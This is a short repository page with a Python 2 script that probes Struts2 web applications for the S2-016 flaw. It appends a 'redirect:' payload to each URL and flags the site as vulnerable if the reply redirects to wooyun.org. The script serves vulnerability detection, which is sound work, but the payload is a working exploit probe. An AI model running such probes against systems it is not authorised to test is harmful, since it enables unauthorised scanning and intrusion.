struts_s2-016_vul_checker

最近的struts2漏洞检测脚本，现在各大网站应该已经修复。

#!/usr/bin/env python
# -*- coding=utf-8 -*-

'''
author: xjump.me#at#gmail.com
file: struts_s2-016_vul_checker.py
useage: 
  config the check_urls and 
  run `python struts_s2-016_vul_checker.py`
ref:
  http://struts.apache.org/release/2.3.x/docs/s2-016.html
'''

check_urls=[
  'http://localhost:8080/struts2-blank/example/HelloWorld.action',
]

import pycurl
import sys
import urlparse

headers = {
  'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
  'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  'Accept-Language' : 'en-US,en;q=0.8',
  'Accept-Charset' : 'utf-8;q=0.7,*;q=0.3',
  'Connection' : 'keep-alive',
}

payload_scan=r"redirect:http://wooyun.org"

def line_sep():
  print "*" * 79

class Handler:
  def __init__(self):
    self.data = ''
  def write_callback(self, buf):
    self.data = self.data + buf
  def get_data(self):
    return self.data

def debug_cb(debug_type, debug_msg):
  print "debug(%d): %s" % (debug_type, debug_msg)
  
def progress_cb(total, existing, upload_t, upload_d):
  pass
  '''
  try:
    frac = float(existing)/float(total)
  except:
    frac = 0
  sys.stdout.write("\r%s %3i%" % ("file", frac*100)  )
  '''
    
def do_scan(url, arg_timeout=1000, debug=0):
  h_body = Handler()
  h_head = Handler()
  c = pycurl.Curl()
  
  attack_url = url + "?" + payload_scan
  t_url=urlparse.urlparse(url)
  strScheme=t_url.scheme
  strHost = t_url.netloc
  strURL1 = t_url.path
  
  c.setopt(c.URL, attack_url)
  c.setopt(c.HTTPHEADER, ["Host: %s" % strHost] + [i[0]+": "+i[1] for i in headers.items()])
  c.setopt(c.USERAGENT, headers["User-Agent"])

  c.setopt(c.WRITEFUNCTION, h_body.write_callback)
  c.setopt(c.HEADERFUNCTION, h_head.write_callback)
  
  if debug:
    c.setopt(c.NOPROGRESS, 0)
    c.setopt(c.PROGRESSFUNCTION, progress_cb)
    c.setopt(c.DEBUGFUNCTION, debug_cb)
    c.setopt(c.VERBOSE,debug)
  
  c.setopt(c.HTTPGET, 1)
  c.setopt(c.TIMEOUT, arg_timeout)
  c.setopt(c.HTTP_VERSION, c.CURL_HTTP_VERSION_1_1)
  
  try:
    c.perform()
  except Exception as e:
    #print e
    return
    
  c.reset()
  c.close()
  
  body = h_body.get_data()
  head = h_head.get_data()
  #print "[*] GET %s, response header is" % attack_url
  #line_sep()
  #print head
  if r"Location: http://wooyun.org" in head:
    print "\n[+] Vul found for %s.\n" % url
  else:
    print "[-] %s is Secured." % url
  #line_sep()
  
  #check
  #print body

if __name__=="__main__":
  for i in check_urls:
    ret = do_scan(i, debug=0)